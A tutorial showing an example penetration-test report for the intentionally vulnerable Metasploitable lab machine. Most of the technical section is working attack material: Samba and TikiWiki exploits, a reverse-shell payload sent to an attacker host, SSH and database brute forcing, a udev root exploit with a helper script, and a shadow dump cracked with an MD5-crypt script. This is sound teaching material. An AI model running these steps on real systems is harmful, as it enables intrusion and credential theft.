HowTo: Penetration test report example [Metasploitable]

Finding a vulnerability is not easy, we know, but the finding is useless to system administrators, CTOs, CISOs or web application developers without a penetration test report.

In this tutorial we'll explain how to complete a penetration testing report. It is generally accepted that a pentest report needs at least two sections: the executive summary and the technical report. For now, we don't enforce any particular standard for completing the penetration testing report.

If you already use an existing standard or have your own style of producing a useful report, you may use that. Otherwise, we recommend following the Penetration Testing Execution Standard (PTES) reporting guidelines. They are easy to follow and well structured, although not all sections apply to this platform because of the way Hack a Server works. The whole description of the report structure fits on a single wiki page, which is much easier to follow than the 200-page books other standards provide.

For the purpose of this tutorial, we used the “Metasploitable” instance which served as target. It is available on our platform but you may also download its image from the Internet. You may reproduce the findings yourself if you want to.

Since the client is anonymous, for the purpose of this tutorial it is referred to as “the client”. The platform assigns random IP addresses to the machines in the playground arena, so a machine is usually referred to by its hostname. The IP address of the target machine was 10.0.0.3, but this serves only as an example for this tutorial.

Please note that this tutorial may not cover all the vulnerabilities of the instance; feedback is appreciated. Also, Metasploitable was deliberately built as a highly vulnerable target, so don't expect this density of findings in most real-life scenarios.

The example pentest report:

The Executive Summary

Background

The client tasked the pentester with performing an internal/external vulnerability assessment and penetration test of the Metasploitable machine. This system has been identified as being at extreme risk of its security controls being compromised. The purpose of this assessment was to verify the effectiveness of the security controls put in place by the client to secure business-critical information.

Overall Posture

The system lacks effective patch management of the vulnerable services. The system also lacks strong authentication credentials which puts most of the running services at risk.

Risk Ranking/Profile

The “Overall Risk Score” for the Metasploitable machine is currently fifteen (15). This rating implies an EXTREME risk of security controls being compromised, with the potential for catastrophic financial losses. The pentester determined this score based on four (4) extreme-risk vulnerabilities, together with the successful exploitation of each of them. The most severe finding was superuser access, attainable by four different methods; this amounts to a full system compromise. Several less severe vulnerabilities could lead to theft of valid account credentials and leakage of information.

General Findings

The following were identified:

- 7 vulnerabilities due to easily guessable credentials
- 4 vulnerabilities due to missing patches
- 3 vulnerabilities due to lack of OS hardening

Recommendation Summary

The system services should be updated to the latest versions which contain patches for the found vulnerabilities. The weak credentials should be replaced by strong credentials. These procedures have top priority.

The Technical Report

Information Gathering

Information about the running services was gathered by running nmap against the address of the Metasploitable machine. Some service-specific information was gathered with the auxiliary modules of the Metasploit Framework.

Vulnerability Assessment

The nmap scanner identified most of the services which were listening on the network:

21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1

The smb_version scanner of the Metasploit Framework identified the exact version of the running Samba server: Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP). This version falls within the range affected by CVE-2007-2447 (command injection through the “username map script” option), which an attacker can use to gain remote superuser access.

Exploitation/Vulnerability Confirmation

Using the Metasploit Framework exploit for CVE-2007-2447 in the running Samba service, the exploit/multi/samba/usermap_script module, a remote superuser shell was obtained. The module defaults to port 139 and was pointed at port 445 here; both ports are served by the same vulnerable smbd.

msf auxiliary(smb_version) > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(usermap_script) > set RHOST 10.0.0.3
RHOST => 10.0.0.3
msf exploit(usermap_script) > set RPORT 445
RPORT => 445
msf exploit(usermap_script) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo mdf6b1a2vlpL5byf;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "mdf6b1a2vlpL5byf\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.0.0.2:4444 -> 10.0.0.3:60740) at 2012-04-11 17:11:02 -0400
id
uid=0(root) gid=0(root)
ifconfig eth0
eth0 Link encap:Ethernet HWaddr 08:00:27:dc:ca:70
inet addr:10.0.0.3 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fedc:ca70/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:704 errors:0 dropped:0 overruns:0 frame:0
TX packets:1178 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:65873 (64.3 KB) TX bytes:81962 (80.0 KB)
Base address:0xd010 Memory:f0000000-f0020000

The running SSH service can be attacked with a basic brute force run that tries each username as its own password (the USER_AS_PASS option of the login modules), using the unix_users.txt list shipped with Wfuzz:


msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set RHOSTS 10.0.0.3
msf auxiliary(ssh_login) > set USER_FILE /pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/unix-os/unix_users.txt
msf auxiliary(ssh_login) > run
[*] 10.0.0.3:22 SSH - Starting bruteforce
[*] Command shell session 1 opened (10.0.0.2:38601 -> 10.0.0.3:22) at 2012-04-14 14:37:58 -0400
[+] 10.0.0.3:22 SSH - [174/216] - Success: 'postgres':'postgres' 'uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 2 opened (10.0.0.2:34166 -> 10.0.0.3:22) at 2012-04-14 14:38:18 -0400
[+] 10.0.0.3:22 SSH - [184/216] - Success: 'service':'service' 'uid=1002(service) gid=1002(service) groups=1002(service) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 3 opened (10.0.0.2:43396 -> 10.0.0.3:22) at 2012-04-14 14:39:06 -0400
[+] 10.0.0.3:22 SSH - [207/216] - Success: 'user':'user' 'uid=1001(user) gid=1001(user) groups=1001(user) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell SSH postgres:postgres (10.0.0.3:22) 10.0.0.2:38601 -> 10.0.0.3:22
2 shell SSH service:service (10.0.0.3:22) 10.0.0.2:34166 -> 10.0.0.3:22
3 shell SSH user:user (10.0.0.3:22) 10.0.0.2:43396 -> 10.0.0.3:22

Inspecting the sessions showed that the “user” account holds what is needed to reach another system account, msfadmin. The shell history of the user account contains this:


sudo cat ~/.ssh/id_dsa.pub >> /home/msfadmin/.ssh/authorized_keys

Therefore, from the user account, a key-based login to msfadmin proved to be possible:


ssh msfadmin@localhost

Inspecting the msfadmin shell history, this information was found:


sudo mkdir /root/.ssh; sudo cat .ssh/id_rsa.pub >> /root/.ssh/authorized_keys
sudo cat .ssh/id_rsa.pub >> /root/.ssh/authorized_keys

Gaining root access via SSH with the private key stored in the msfadmin account proved to be possible:


ssh root@localhost
id
uid=0(root) gid=0(root)

From the SSH user shell obtained previously, the udev version could be identified:


udevinfo --version
117

This version is known to be affected by CVE-2009-1185 (udev before 1.4.1 does not verify that a netlink message originates from the kernel, so a local user can feed it crafted events). By exploiting this vulnerability, a local user can gain root privileges. Since it is a local vulnerability, some intermediate steps were required to exploit it remotely.

1. Compile a reverse shell payload as a single binary.


msfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.4 LPORT=4444 X > run
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell_reverse_tcp
Length: 71
Options: {"LHOST"=>"10.0.0.4", "LPORT"=>"4444"}

The LHOST and LPORT parameters indicate the attacker’s machine.

2. Upload the compiled binary to /tmp/run and make it executable.


scp run user@10.0.0.3:/tmp/run
user@10.0.0.3's password:
run
ssh user@10.0.0.3
chmod +x /tmp/run

The executable is placed at /tmp/run because that is the path this exploit instructs udevd to execute as root.

3. Start a listener for the reverse shell.


msf > use multi/handler
msf exploit(handler) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...

4. Get the exploit source, compile it on the target machine, then run it.

The exploit source code is available at http://www.exploit-db.com/exploits/8572/. Fortunately, the Metasploitable machine has a working gcc compiler, so the exploit binary can be built on the target itself:


gcc udev.c -o udev

The resulting ‘udev’ binary takes a single argument: the PID of the udevd netlink socket. As the exploit's header notes, this PID is listed in /proc/net/netlink and is usually the PID of the udevd process minus one:


ps -A | grep udevd
./udev [above returned PID - 1]

The listener started on the Metasploit Framework console should receive a new session if everything is done properly:


[*] Command shell session 1 opened (10.0.0.4:4444 -> 10.0.0.3:48112) at 2012-04-16 06:04:41 +0300
msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell linux 10.0.0.4:4444 -> 10.0.0.3:48112 (10.0.0.3)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
id
uid=0(root) gid=0(root)
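The “udevd PID minus one” rule of thumb works on Metasploitable but is only a heuristic. The authoritative source is /proc/net/netlink, where the udevd socket is the user-space entry bound to protocol 15 (NETLINK_KOBJECT_UEVENT). The following script, added here as an example and not part of the original report, parses that file and prints the exact command line for the compiled exploit binary. The SAMPLE_NETLINK text is a constructed example of the file's layout, not a capture from the target; the ./udev binary name is the one built above.

```python
"""Locate the udevd netlink socket PID that the CVE-2009-1185 exploit needs.

Added example, not part of the original report. It parses the text of
/proc/net/netlink (the file the exploit-db 8572 header points at) and
returns the PIDs bound to NETLINK_KOBJECT_UEVENT (protocol 15), which is
more reliable than the "udevd PID minus one" rule of thumb.
"""
import sys

NETLINK_KOBJECT_UEVENT = 15  # protocol number of the uevent netlink family

# Constructed sample of /proc/net/netlink (assumed layout), not a target capture.
SAMPLE_NETLINK = """\
sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
c1a1e000 0   0      00000000 0        0        00000000 2
c1a1f400 15  0      00000000 0        0        00000000 2
c1a1f800 15  2686   00000001 0        0        00000000 2
c1a1fc00 16  0      00000000 0        0        00000000 2
"""


def uevent_socket_pids(netlink_text):
    """Return user-space PIDs holding a NETLINK_KOBJECT_UEVENT socket."""
    pids = []
    for line in netlink_text.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 3:
            continue
        proto, pid = int(fields[1]), int(fields[2])
        # Pid 0 is the kernel-side socket; udevd is the user-space listener.
        if proto == NETLINK_KOBJECT_UEVENT and pid != 0:
            pids.append(pid)
    return pids


def exploit_command(netlink_text, binary="./udev"):
    """Build the command line for the compiled exploit-db 8572 binary."""
    pids = uevent_socket_pids(netlink_text)
    if not pids:
        raise RuntimeError("no user-space uevent netlink socket; is udevd running?")
    return "%s %d" % (binary, pids[0])


if __name__ == "__main__":
    # On the target: python3 find_udev_pid.py   (reads the live /proc/net/netlink)
    # Offline:       python3 find_udev_pid.py saved_netlink.txt
    path = sys.argv[1] if len(sys.argv) > 1 else "/proc/net/netlink"
    with open(path) as fh:
        print(exploit_command(fh.read()))
```

Run it on the target (or on a copy of /proc/net/netlink) and pass the printed PID to the exploit instead of guessing from the process list.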

By using any of the above root shells, one can easily retrieve the passwd and the shadow files:


# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false


# cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
news:*:14684:0:99999:7:::
uucp:*:14684:0:99999:7:::
proxy:*:14684:0:99999:7:::
www-data:*:14684:0:99999:7:::
backup:*:14684:0:99999:7:::
list:*:14684:0:99999:7:::
irc:*:14684:0:99999:7:::
gnats:*:14684:0:99999:7:::
nobody:*:14684:0:99999:7:::
libuuid:!:14684:0:99999:7:::
dhcp:*:14684:0:99999:7:::
syslog:*:14684:0:99999:7:::
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
sshd:*:14684:0:99999:7:::
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
bind:*:14685:0:99999:7:::
postfix:*:14685:0:99999:7:::
ftp:*:14685:0:99999:7:::
postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::

With the unshadow utility of John the Ripper, these files can be converted to a format that JtR can bruteforce:


/pentest/passwords/john/unshadow passwd shadow > unshadow
/pentest/passwords/john/john unshadow
Loaded 7 password hashes with 7 different salts (FreeBSD MD5 [32/32])
postgres (postgres)
user (user)
msfadmin (msfadmin)
service (service)
123456789 (klog)
batman (sys)

Six system account passwords were recovered; John prints them in the format password (username). The root hash was not cracked in the time available.
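All the cracked hashes above are MD5-crypt ($1$) hashes, and four of the six passwords are simply the account name. The script below, added here as an example and not part of the original report, reproduces the John result with nothing but the Python standard library: it implements the MD5-crypt algorithm and checks every $1$ entry of the shadow excerpt against its own username plus a short candidate list. The shadow lines and the two extra candidates (123456789, batman) are taken from the report itself; the function names are this example's own.

```python
"""Offline check of /etc/shadow for username-as-password and other trivial
passwords, using a pure-Python MD5-crypt ($1$) implementation.

Added example, not part of the original report; it reproduces what the
unshadow/john step above found, using only hashlib.
"""
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, count):
    """crypt(3)-style base64: least significant 6 bits first."""
    out = ""
    for _ in range(count):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5crypt(password, salt):
    """FreeBSD/glibc MD5-crypt: returns '$1$<salt>$<hash>' for password."""
    pw = password.encode()
    salt = salt[:8].encode()          # crypt uses at most 8 salt characters
    ctx = hashlib.md5(pw + b"$1$" + salt)
    alt = hashlib.md5(pw + salt + pw).digest()
    remaining = len(pw)
    while remaining > 0:              # mix in alt, 16 bytes per 16 chars of pw
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    i = len(pw)
    while i:                          # the "something really weird" step
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):             # 1000-round stretching
        ctx1 = hashlib.md5()
        ctx1.update(pw if i & 1 else final)
        if i % 3:
            ctx1.update(salt)
        if i % 7:
            ctx1.update(pw)
        ctx1.update(final if i & 1 else pw)
        final = ctx1.digest()
    out = ""
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        out += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    out += _to64(final[11], 2)
    return "$1$" + salt.decode() + "$" + out


def audit_shadow(shadow_text, extra_candidates=()):
    """Return {user: password} for every $1$ account whose password is its own
    username or one of extra_candidates. Locked (*, !) entries are skipped."""
    cracked = {}
    for line in shadow_text.splitlines():
        if not line.strip():
            continue
        user, hashed = line.split(":")[:2]
        if not hashed.startswith("$1$"):
            continue                  # locked account or another hash type
        salt = hashed.split("$")[2]
        for candidate in (user,) + tuple(extra_candidates):
            if md5crypt(candidate, salt) == hashed:
                cracked[user] = candidate
                break
    return cracked


# The $1$ entries from the /etc/shadow dump above, plus two locked ones.
SHADOW_EXCERPT = """\
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
mysql:!:14685:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
"""

if __name__ == "__main__":
    for user, password in audit_shadow(SHADOW_EXCERPT, ("123456789", "batman")).items():
        print("%s (%s)" % (password, user))
```

The same check is worth running as a defender before an attacker does: with only the username and a handful of candidates per account it takes a fraction of a second, which is exactly why MD5-crypt with trivial passwords offers no protection once /etc/shadow leaks.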

Since the msfadmin user also has a weak password, msfadmin, there is yet another way to get root, because this user proved to have sudo access:


sudo -s
[sudo] password for msfadmin:
id
uid=0(root) gid=0(root) groups=0(root)

The msfadmin password is weak, so this credential can be obtained by means other than first having root access and cracking the shadow file, for example by online password guessing against SSH.

The running MySQL database server is vulnerable to easily guessable credentials as well:


msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options
Module options (auxiliary/scanner/mysql/mysql_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 3306 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS true no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(mysql_login) > set VERBOSE false
VERBOSE => false
msf auxiliary(mysql_login) > set THREADS 5
THREADS => 5
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS.
msf auxiliary(mysql_login) > set RHOSTS 10.0.0.3
RHOSTS => 10.0.0.3
msf auxiliary(mysql_login) > set USER_FILE /pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/unix-os/unix_users.txt
USER_FILE => /pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/unix-os/unix_users.txt
msf auxiliary(mysql_login) > run
[+] 10.0.0.3:3306 - SUCCESSFUL LOGIN 'root' : 'root'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

With the root user of the MySQL server, everything stored in the database is accessible to an attacker. Because root also holds the FILE privilege, LOAD_FILE() returns the contents of any file that the mysqld process itself can read, which gives an alternative route to the system user list:


mysql -h 10.0.0.3 -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 10
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> SELECT LOAD_FILE('/etc/passwd')\g
[...]
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false

The running PostgreSQL database server is vulnerable to easily guessable credentials as well:


msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) > show options
Module options (auxiliary/scanner/postgres/postgres_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DATABASE template1 yes The database to authenticate against
PASSWORD no A specific password to authenticate with
PASS_FILE /opt/framework/msf3/data/wordlists/postgres_default_pass.txt no File containing passwords, one per line
RETURN_ROWSET true no Set to true to see query result sets
RHOSTS yes The target address range or CIDR identifier
RPORT 5432 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME postgres no A specific username to authenticate as
USERPASS_FILE /opt/framework/msf3/data/wordlists/postgres_default_userpass.txt no File containing (space-seperated) users and passwords, one pair per line
USER_AS_PASS true no Try the username as the password for all users
USER_FILE /opt/framework/msf3/data/wordlists/postgres_default_user.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(postgres_login) > set THREADS 5
THREADS => 5
msf auxiliary(postgres_login) > set VERBOSE false
VERBOSE => false
msf auxiliary(postgres_login) > set USER_FILE /pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/unix-os/unix_users.txt
USER_FILE => /pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/unix-os/unix_users.txt
msf auxiliary(postgres_login) > set RHOSTS 10.0.0.3
RHOSTS => 10.0.0.3
msf auxiliary(postgres_login) > run
[+] 10.0.0.3:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The database server contains a couple of databases: template0 and template1, but no useful information was found in them.

Because the document root of the running Apache server (/var/www) is world readable, the following listing could be retrieved from any local shell:


ls -l /var/www
-rw-r--r-- 1 root root 19 2010-04-16 02:12 phpinfo.php
drwxrwxr-x 22 msfadmin msfadmin 20480 2010-04-19 18:54 tikiwiki
drwxrwxr-x 22 msfadmin msfadmin 20480 2010-04-16 02:17 tikiwiki-old
drwxr-xr-x 7 msfadmin msfadmin 4096 2010-04-16 15:27 twiki

The phpinfo.php script calls PHP's phpinfo() function, which dumps the server's whole runtime configuration (PHP version, loaded extensions, configuration file paths and environment variables) into the web page. This is valuable reconnaissance information for an attacker and should not be exposed on a production server.

The remaining directories contain web applications. The one in /var/www/tikiwiki/ proved to be a vulnerable TikiWiki installation; the Metasploit module used below targets the tiki-graph_formula.php remote code execution flaw (CVE-2007-5423).


msf exploit(twiki_search) > use exploit/unix/webapp/tikiwiki_graph_formula_exec
msf exploit(tikiwiki_graph_formula_exec) > show options
Module options (exploit/unix/webapp/tikiwiki_graph_formula_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
URI /tikiwiki yes TikiWiki directory path
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(tikiwiki_graph_formula_exec) > set RHOST 10.0.0.3
RHOST => 10.0.0.3
msf exploit(tikiwiki_graph_formula_exec) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
php/bind_perl normal PHP Command Shell, Bind TCP (via perl)
php/bind_perl_ipv6 normal PHP Command Shell, Bind TCP (via perl) IPv6
php/bind_php normal PHP Command Shell, Bind TCP (via php)
php/bind_php_ipv6 normal PHP Command Shell, Bind TCP (via php) IPv6
php/download_exec normal PHP Executable Download and Execute
php/exec normal PHP Execute Command
php/meterpreter/bind_tcp normal PHP Meterpreter, Bind TCP Stager IPv6
php/meterpreter/reverse_tcp normal PHP Meterpreter, PHP Reverse TCP stager
php/reverse_perl normal PHP Command, Double reverse TCP connection (via perl)
php/reverse_php normal PHP Command Shell, Reverse TCP (via php)
msf exploit(tikiwiki_graph_formula_exec) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(tikiwiki_graph_formula_exec) > exploit
[-] Exploit failed: The following options failed to validate: LHOST.
msf exploit(tikiwiki_graph_formula_exec) > set payload php/meterpreter/bind_tcp
payload => php/meterpreter/bind_tcp
msf exploit(tikiwiki_graph_formula_exec) > exploit
[*] Started bind handler
[*] Attempting to obtain database credentials...
[*] No response from the server
[*] Attempting to execute our payload...
[*] Sending stage (38791 bytes) to 10.0.0.3
[*] Meterpreter session 1 opened (10.0.0.4:36968 -> 10.0.0.3:4444) at 2012-04-16 04:44:12 +0300
meterpreter > shell
Process 5799 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Since the tikiwiki installation directory is world readable, any local user, not just www-data, can read the MySQL credentials that TikiWiki stores in its db/local.php configuration file.

From a local shell, a listening service that the nmap scan did not pick up could be spotted. By default nmap probes only its 1000 most common TCP ports and 3632 is not among them; a full port sweep (nmap -p- 10.0.0.3) during information gathering would have found it:


user@metasploitable:~$ netstat -atln
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:8009 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:8180 0.0.0.0:* LISTEN
tcp 0 0 192.168.1.4:53 0.0.0.0:* LISTEN
tcp 0 0 10.0.0.3:53 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:5432 0.0.0.0:* LISTEN
